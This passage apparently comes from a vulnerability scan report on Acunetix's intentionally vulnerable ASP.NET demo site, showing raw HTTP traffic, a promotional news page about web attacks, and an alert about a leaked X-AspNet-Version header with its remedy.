VseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/sNcuYAa/cRqMvUgVyEWyccHwUIA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3745 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (3745 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9jwc%2FcRnTJwdNTwN8SPSTaigKqpw%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:21 GMT Content-Length: 17859Response body (17859 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXg